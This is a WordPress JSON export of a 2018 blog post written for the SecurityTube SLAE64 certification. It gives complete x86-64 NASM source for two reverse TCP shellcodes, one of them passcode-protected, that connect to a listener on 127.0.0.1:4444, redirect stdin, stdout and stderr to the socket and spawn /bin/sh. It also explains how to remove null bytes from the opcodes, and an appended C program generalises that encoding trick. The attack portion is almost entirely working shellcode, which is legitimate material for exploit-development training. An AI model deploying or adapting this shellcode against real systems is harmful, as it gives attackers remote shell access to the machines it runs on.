{"id":194,"date":"2018-02-25T11:40:20","date_gmt":"2018-02-25T10:40:20","guid":{"rendered":"http:\/\/pentester.blog\/?p=194"},"modified":"2019-08-18T19:48:00","modified_gmt":"2019-08-18T17:48:00","slug":"slae64-assignment-2-shell-reverse-tcp-shellcode","status":"publish","type":"post","link":"https:\/\/hacktarus.fr\/?p=194","title":{"rendered":"SLAE64 &#8211; Assignment #2 &#8211; Shell Reverse TCP shellcode"},"content":{"rendered":"<p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:<\/p>\n<p>http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html<\/p>\n<p>Student ID: PA-6470<\/p>\n<h2>Assignment #2<\/h2>\n<p>The aim of this assignment is to create a shell reverse TCP shellcode with a passcode and to remove all 0x00 bytes from the opcodes.<\/p>\n<p>First, we need to listen for incoming connections on port 4444:<\/p>\n<h2><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-197\" src=\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/02\/slae64-2-1.png\" alt=\"\" width=\"1266\" height=\"226\" \/><\/h2>\n<p>Then we launch the shellcode:<\/p>\n<h2><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-200\" src=\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/02\/slae64-2-2bis.png\" alt=\"\" width=\"1370\" height=\"232\" \/><\/h2>\n<p>The reverse TCP shellcode connects back to port 4444 and, once the passcode is accepted, we get a \/bin\/sh shell on the listener!<\/p>\n<h2><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-199\" style=\"font-size: 1.28571rem;\" src=\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/02\/slae64-2-3.png\" alt=\"\" width=\"626\" height=\"217\" \/><\/h2>\n<p>Here are the opcodes of this shellcode; as you can see, they contain no 0x00 byte:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-201\" 
src=\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/02\/slae64-2-4.png\" alt=\"\" width=\"2000\" height=\"360\" \/><\/p>\n<p>The passcode part is exactly the same as the one described in <a href=\"http:\/\/hacktarus.fr\/?p=173&amp;preview=true\">Assignment #1<\/a>: the shellcode writes a prompt, reads the reply (from the socket, since stdin and stdout have been redirected to it) and compares it byte by byte with the expected passcode before calling execve.<\/p>\n<p>One thing about removing 0x00 bytes. In a few places the original code needs an immediate that contains 0x00, like the little-endian encoding of 127.0.0.1 here:<\/p>\n<pre>mov dword [rsp-4], 0x0100007f<\/pre>\n<p>So I chose to use a subtraction between two immediates that are free of 0x00 and give the same result (0x9A999A18 - 0x99999999 = 0x0100007F):<\/p>\n<pre>;mov dword [rsp-4], 0x0100007f\r\nmov dword [rsp -4], 0x9A999A18\r\nsub dword [rsp -4], 0x99999999<\/pre>\n<p>The same trick is applied to sin_family = AF_INET (0x0002), written as 0x1FF - 0x1FD. The port does not need it: htons(4444) is 0x115c, stored as the little-endian word 0x5c11, which has no 0x00 byte.<\/p>\n<p>Full source code is available below and on my <a href=\"https:\/\/github.com\/kahlon81\/SLAE64\">Github<\/a> account.<\/p>\n<h2>Source code of Reverse-Shell-Passcode-Safe.nasm<\/h2>\n<pre>; This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :\r\n; http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html\r\n;\r\n; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n;\r\n; nasm -f elf64 Reverse-Shell-Passcode-Safe.nasm -o Reverse-Shell-Passcode-Safe.o\r\n; ld Reverse-Shell-Passcode-Safe.o -o Reverse-Shell-Passcode-Safe\r\n\r\nglobal _start\r\n\r\n; .bss and .data only provide the size constants: the prompt, the passcode\r\n; and the input buffer are built on the stack so the code needs no absolute address\r\nsection .bss\r\n    buffer resb 20               ; buffer of 20 bytes\r\n    buffer_size equ $ - buffer   ; buffer size\r\n    \r\nsection .data\r\n    passcode: db 'pwd',0x0a\r\n    passcode_required: db '#passcode : '\r\n    passcode_required_size equ $ - passcode_required\r\n\r\nsection .text\r\n_start:\r\n\r\n\t; sock = socket(AF_INET, SOCK_STREAM, 0)\r\n\t; AF_INET = 2\r\n\t; SOCK_STREAM = 1\r\n\t; syscall number 41 \r\n\r\n\txor rax, rax\r\n\tadd al, 41\r\n\t\r\n\txor rdi, rdi\r\n\tinc dil\r\n\tinc dil\r\n\r\n\txor rsi, rsi\r\n\tinc sil\t\r\n\r\n\txor rdx, rdx\r\n\tsyscall\r\n\r\n\t; copy socket descriptor to rdi for future use \r\n\r\n\tmov rdi, rax\r\n\r\n\r\n\t; 
server.sin_family = AF_INET \r\n\t; server.sin_port = htons(PORT)\r\n\t; server.sin_addr.s_addr = inet_addr(\"127.0.0.1\")\r\n\t; bzero(&amp;server.sin_zero, 8)\r\n\t; the struct is built on the stack from the top down: sin_zero, then addr, port, family\r\n\r\n\txor rax, rax \r\n\r\n\tpush rax                        ; sin_zero: 8 zero bytes\r\n\t\r\n\t;mov dword [rsp-4], 0x0100007f  ; 127.0.0.1 contains 0x00 bytes\r\n\tmov dword [rsp -4], 0x9A999A18  ; 0x9A999A18 - 0x99999999 = 0x0100007F\r\n\tsub dword [rsp -4], 0x99999999\r\n\r\n\tmov word [rsp-6], 0x5c11        ; htons(4444) = 0x115c, stored little-endian\r\n\t\r\n\t;mov word [rsp-8], 0x2          ; AF_INET contains a 0x00 byte\r\n        mov word [rsp-8], 0x1FF         ; 0x1FF - 0x1FD = 0x2\r\n        sub word [rsp-8], 0x1FD\r\n\r\n\tsub rsp, 8                      ; rsp now points to the 16-byte struct\r\n\r\n\r\n\t; connect(sock, (struct sockaddr *)&amp;server, sockaddr_len)\r\n\t; syscall number 42, rdi still holds sock\r\n\t\r\n\txor rax, rax\r\n\tadd al, 42\r\n\r\n\tmov rsi, rsp\r\n\t\r\n\txor rdx, rdx\r\n\tadd dl, 16\t                    ; sizeof(struct sockaddr_in)\r\n\r\n\tsyscall\r\n\r\n\r\n        ; redirect stdin, stdout and stderr to the socket\r\n\r\n        ; dup2(oldfd, newfd): rdi = sock (kept from above), rsi = 0, 1, 2\r\n        ; syscall number 33\r\n        \r\n\txor rax, rax\r\n\tadd al, 33\r\n\r\n        xor rsi, rsi                    ; newfd = 0 (stdin)\r\n\tsyscall\r\n\r\n        xor rax, rax\r\n\tadd al, 33\r\n\r\n        xor rsi, rsi\r\n\tinc sil                         ; newfd = 1 (stdout)\r\n\r\n\tsyscall\r\n\r\n        xor rax, rax\r\n\tadd al, 33\r\n\r\n        xor rsi, rsi\r\n\tinc sil\r\n\tinc sil\t                        ; newfd = 2 (stderr)\r\n\r\n\tsyscall\r\n\r\n\r\n\t; passcode is required: write the prompt (stdout is now the socket)\r\n\r\n\txor rdx, rdx\r\n\tmov dl, passcode_required_size\r\n\r\n\t;mov rsi, passcode_required\r\n\tpush 0x203a2065\t\t\t; 'e : ' (last 4 bytes of '#passcode : ')\r\n\tmov rbx, 0x646f637373617023\t; '#passcod' (first 8 bytes)\r\n\tpush rbx\r\n\tmov rsi, rsp \r\n\r\n\txor rdi, rdi\r\n\tmov dil, 1   ; stdout\r\n        xor rax, rax\r\n\tmov al, 1    ; sys_write\r\n\tsyscall\t\r\n\r\n\t; user input (stdin is now the socket)\r\n        \r\n\t;mov rdx, buffer_size\r\n        xor rdx, rdx\r\n\tmov dl, buffer_size\t\r\n\r\n\t;mov rsi, buffer\r\n        mov rbx, 0x0101010101010101     ; 8-byte stack slot; read() may write up to 20 bytes here\r\n\tpush rbx                        ; and run over the prompt bytes above it, which are no longer needed\r\n\tmov rsi, rsp\r\n\r\n\txor rdi, rdi   ; stdin\r\n        xor rax, rax \r\n\tsyscall        ; sys_read\r\n\r\n\t; check passcode \r\n\t\r\n\t;lea rsi, [buffer]      ; user passcode\r\n\t;mov rsi, buffer\r\n\r\n\t;lea rdi, [passcode]    ; true passcode\r\n\t;mov rdi, passcode\r\n\tpush 0x0a647770\t\t; 'pwd', 0x0a\r\n\tmov rdi, rsp\r\n\r\n\txor rcx, rcx \r\n\tdec rcx\r\ncmp_pwd:\r\n\tinc 
rcx\r\n        mov al, byte [rsi + rcx]\r\n\tmov dl, byte [rdi + rcx]\r\n\tcmp al, dl                  ; compare each character\r\n        jne exit                    ; jump out of loop if they are not the same\r\n\tcmp dl, 0x0a                ; end of string ?\r\n\tjne cmp_pwd                 ; not finished, loop again\r\n\r\n\r\n        ; execve\r\n\r\n        ; First NULL push\r\n\r\n        xor rax, rax\r\n        push rax\r\n\r\n        ; push \/bin\/\/sh in reverse\r\n\r\n        mov rbx, 0x68732f2f6e69622f\r\n        push rbx\r\n\r\n        ; store \/bin\/\/sh address in RDI\r\n\r\n        mov rdi, rsp\r\n\r\n        ; Second NULL push\r\n        push rax\r\n\r\n        ; set RDX\r\n        mov rdx, rsp\r\n\r\n        ; Push address of \/bin\/\/sh\r\n        push rdi\r\n\r\n        ; set RSI\r\n\r\n        mov rsi, rsp\r\n\r\n        ; Call the Execve syscall\r\n        add rax, 59\r\n        syscall\r\n \r\nexit:\r\n\txor rdi, rdi\r\n\tadd dil, 1\r\n\txor rax, rax\r\n\tadd al, 60\r\n        syscall\r\n<\/pre>\n<h2>Source code of Reverse-Shell-Safe.nasm :<\/h2>\n<pre>; This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :\r\n; http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html\r\n;\r\n; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n;\r\n; nasm -f elf64 Reverse-Shell-Safe.nasm -o Reverse-Shell-Safe.o\r\n; ld Reverse-Shell-Safe.o -o Reverse-Shell-Safe\r\n\r\nglobal _start\r\n\r\n\r\n_start:\r\n\r\n\t; sock = socket(AF_INET, SOCK_STREAM, 0)\r\n\t; AF_INET = 2\r\n\t; SOCK_STREAM = 1\r\n\t; syscall number 41 \r\n\r\n\txor rax, rax\r\n\tadd al, 41\r\n\t\r\n\txor rdi, rdi\r\n\tinc dil\r\n\tinc dil\r\n\r\n\txor rsi, rsi\r\n\tinc sil\t\r\n\r\n\txor rdx, rdx\r\n\tsyscall\r\n\r\n\t; copy socket descriptor to rdi for future use \r\n\r\n\tmov rdi, rax\r\n\r\n\r\n\t; server.sin_family = AF_INET \r\n\t; server.sin_port = 
htons(PORT)\r\n\t; server.sin_addr.s_addr = inet_addr(\"127.0.0.1\")\r\n\t; bzero(&amp;server.sin_zero, 8)\r\n\t; the struct is built on the stack from the top down: sin_zero, then addr, port, family\r\n\r\n\txor rax, rax \r\n\r\n\tpush rax                        ; sin_zero: 8 zero bytes\r\n\t\r\n\t;mov dword [rsp-4], 0x0100007f  ; 127.0.0.1 contains 0x00 bytes\r\n\tmov dword [rsp -4], 0x9A999A18  ; 0x9A999A18 - 0x99999999 = 0x0100007F\r\n\tsub dword [rsp -4], 0x99999999\r\n\r\n\tmov word [rsp-6], 0x5c11        ; htons(4444) = 0x115c, stored little-endian\r\n\t\r\n\t;mov word [rsp-8], 0x2          ; AF_INET contains a 0x00 byte\r\n        mov word [rsp-8], 0x1FF         ; 0x1FF - 0x1FD = 0x2\r\n        sub word [rsp-8], 0x1FD\r\n\r\n\tsub rsp, 8                      ; rsp now points to the 16-byte struct\r\n\r\n\r\n\t; connect(sock, (struct sockaddr *)&amp;server, sockaddr_len)\r\n\t; syscall number 42, rdi still holds sock\r\n\t\r\n\txor rax, rax\r\n\tadd al, 42\r\n\r\n\tmov rsi, rsp\r\n\t\r\n\txor rdx, rdx\r\n\tadd dl, 16\t                    ; sizeof(struct sockaddr_in)\r\n\r\n\tsyscall\r\n\r\n\r\n        ; redirect stdin, stdout and stderr to the socket\r\n\r\n        ; dup2(oldfd, newfd): rdi = sock (kept from above), rsi = 0, 1, 2\r\n        ; syscall number 33\r\n        \r\n\txor rax, rax\r\n\tadd al, 33\r\n\r\n        xor rsi, rsi                    ; newfd = 0 (stdin)\r\n\tsyscall\r\n\r\n        xor rax, rax\r\n\tadd al, 33\r\n\r\n        xor rsi, rsi\r\n\tinc sil                         ; newfd = 1 (stdout)\r\n\r\n\tsyscall\r\n\r\n        xor rax, rax\r\n\tadd al, 33\r\n\r\n        xor rsi, rsi\r\n\tinc sil\r\n\tinc sil\t                        ; newfd = 2 (stderr)\r\n\r\n\tsyscall\r\n\r\n\r\n        ; execve(\/bin\/\/sh, [\/bin\/\/sh, NULL], envp)\r\n        ; syscall number 59\r\n\r\n        ; First NULL push: terminator of the \/bin\/\/sh string\r\n\r\n        xor rax, rax\r\n        push rax\r\n\r\n        ; push \/bin\/\/sh in reverse (8 bytes; the double slash avoids a 0x00 pad byte)\r\n\r\n        mov rbx, 0x68732f2f6e69622f\r\n        push rbx\r\n\r\n        ; store \/bin\/\/sh address in RDI (filename)\r\n\r\n        mov rdi, rsp\r\n\r\n        ; Second NULL push: argv terminator, also used as an empty envp array\r\n        push rax\r\n\r\n        ; set RDX (envp)\r\n        mov rdx, rsp\r\n\r\n        ; Push address of \/bin\/\/sh (argv[0])\r\n        push rdi\r\n\r\n        ; set RSI (argv)\r\n\r\n        mov rsi, rsp\r\n\r\n        ; Call the Execve syscall\r\n        add rax, 59\r\n        syscall\r\n \r\n\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification : http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html Student ID: PA-6470 Assignment #2 The aim of this assignment is to 
create a shell reverse TCP shellcode with a passcode and to remove all 0x00 from opcodes. First, we need to listen to incoming connections &hellip; <a href=\"https:\/\/hacktarus.fr\/?p=194\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SLAE64 &#8211; Assignment #2 &#8211; Shell Reverse TCP shellcode<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-194","post","type-post","status-publish","format-standard","hentry","category-slae64"],"_links":{"self":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/194","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=194"}],"version-history":[{"count":10,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/194\/revisions"}],"predecessor-version":[{"id":297,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/194\/revisions\/297"}],"wp:attachment":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=194"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=194"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=194"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
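The following C program is an added example; it is not code from the post or from the author's SLAE64 repository. It checks, without executing any shellcode, the two things the assembly above relies on: that the 16 bytes it builds on the stack (AF_INET, htons(4444), 127.0.0.1, eight zero bytes) are byte-for-byte the struct sockaddr_in that connect(2) expects, and that a constant containing 0x00 can always be written as A - B with both immediates free of 0x00. It generalises the post's single hand-picked subtraction (0x9A999A18 - 0x99999999) into a byte-wise search that works for any 16- or 32-bit immediate. It assumes a little-endian x86-64 Linux host, the same target as the shellcode, and the function names (build_shellcode_sockaddr, find_sub_pair, sub_pair_ok, port_word_for) are my own.

```c
/* Added example, not the post's code. Checks the sockaddr_in layout and the
 * null-free subtraction trick used by the reverse shell shellcode.
 * Assumes a little-endian x86-64 Linux host. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/in.h>

/* 1 if any of the low nbytes bytes of v is 0x00 (the bad byte for this assignment). */
static int has_zero_byte(uint32_t v, int nbytes)
{
    for (int i = 0; i < nbytes; i++)
        if (((v >> (8 * i)) & 0xffu) == 0)
            return 1;
    return 0;
}

/* The immediate for "mov word [rsp-6], imm16": htons(port) as the
 * little-endian host reads it back (4444 = 0x115c -> 0x5c11). */
static uint16_t port_word_for(uint16_t port)
{
    return (uint16_t)((port >> 8) | (port << 8));
}

/* Lay out the struct exactly as the shellcode does:
 *   push 0                    -> sin_zero   at rsp+8 (8 bytes)
 *   mov dword [rsp-4], addr   -> sin_addr   at rsp+4
 *   mov word  [rsp-6], port   -> sin_port   at rsp+2
 *   mov word  [rsp-8], 2      -> sin_family at rsp+0
 *   sub rsp, 8
 * addr_dword is the value of the dword store (0x0100007f for 127.0.0.1). */
static void build_shellcode_sockaddr(uint8_t out[16], uint16_t port, uint32_t addr_dword)
{
    uint16_t family = 2;                 /* AF_INET */
    uint16_t port_word = port_word_for(port);
    memset(out, 0, 16);
    memcpy(out + 0, &family, 2);
    memcpy(out + 2, &port_word, 2);
    memcpy(out + 4, &addr_dword, 4);
}

/* 1 if the hand-built 16 bytes equal a libc-built struct sockaddr_in. */
static int sockaddr_matches_libc(uint16_t port, const char *ip, uint32_t addr_dword)
{
    uint8_t mine[16];
    struct sockaddr_in ref;
    build_shellcode_sockaddr(mine, port, addr_dword);
    memset(&ref, 0, sizeof ref);
    ref.sin_family = AF_INET;
    ref.sin_port = htons(port);
    ref.sin_addr.s_addr = inet_addr(ip);
    return sizeof ref == 16 && memcmp(mine, &ref, 16) == 0;
}

/* 1 if "mov X, a / sub X, b" yields target and neither immediate has a 0x00 byte. */
static int sub_pair_ok(uint32_t a, uint32_t b, int nbytes, uint32_t target)
{
    uint32_t mask = nbytes == 4 ? 0xffffffffu : (1u << (8 * nbytes)) - 1u;
    return ((a - b) & mask) == (target & mask)
        && !has_zero_byte(a, nbytes) && !has_zero_byte(b, nbytes);
}

/* Find A and B with A - B == target (mod 2^(8*nbytes)) and no 0x00 byte in
 * either. Greedy from the low byte up: for byte i take the smallest b_i >= 1
 * such that t_i + b_i + carry does not end in 0x00. At most one candidate in
 * 1..255 is bad, so a pair always exists; the final carry is simply dropped.
 * a and b may be NULL. Returns the result of sub_pair_ok on the pair found. */
static int find_sub_pair(uint32_t target, int nbytes, uint32_t *a, uint32_t *b)
{
    uint32_t aa = 0, bb = 0, carry = 0;
    for (int i = 0; i < nbytes; i++) {
        uint32_t t = (target >> (8 * i)) & 0xffu;
        for (uint32_t cand = 1; cand <= 0xffu; cand++) {
            uint32_t s = t + cand + carry;
            if ((s & 0xffu) != 0) {          /* this byte of A is non-zero */
                aa |= (s & 0xffu) << (8 * i);
                bb |= cand << (8 * i);
                carry = s >> 8;
                break;
            }
        }
    }
    if (a) *a = aa;
    if (b) *b = bb;
    return sub_pair_ok(aa, bb, nbytes, target);
}

int main(void)
{
    uint32_t a, b;
    printf("sockaddr layout matches libc: %d\n",
           sockaddr_matches_libc(4444, "127.0.0.1", 0x0100007fu));
    printf("post's pair 0x9A999A18 - 0x99999999 ok: %d\n",
           sub_pair_ok(0x9A999A18u, 0x99999999u, 4, 0x0100007fu));
    find_sub_pair(0x0100007fu, 4, &a, &b);
    printf("127.0.0.1: mov dword [rsp-4], 0x%08X ; sub dword [rsp-4], 0x%08X\n", a, b);
    find_sub_pair(2u, 2, &a, &b);
    printf("AF_INET:   mov word [rsp-8], 0x%04X ; sub word [rsp-8], 0x%04X\n", a, b);
    return 0;
}
```

The struct bytes themselves do contain zeros (sin_zero, two bytes of the address); that is fine because they are produced at run time by instructions whose encodings are null-free, which is all the assignment requires. port_word_for also shows when the port needs the same trick: htons(256) is 0x0001, so a listener on port 256 would need a subtraction pair for the port word as well.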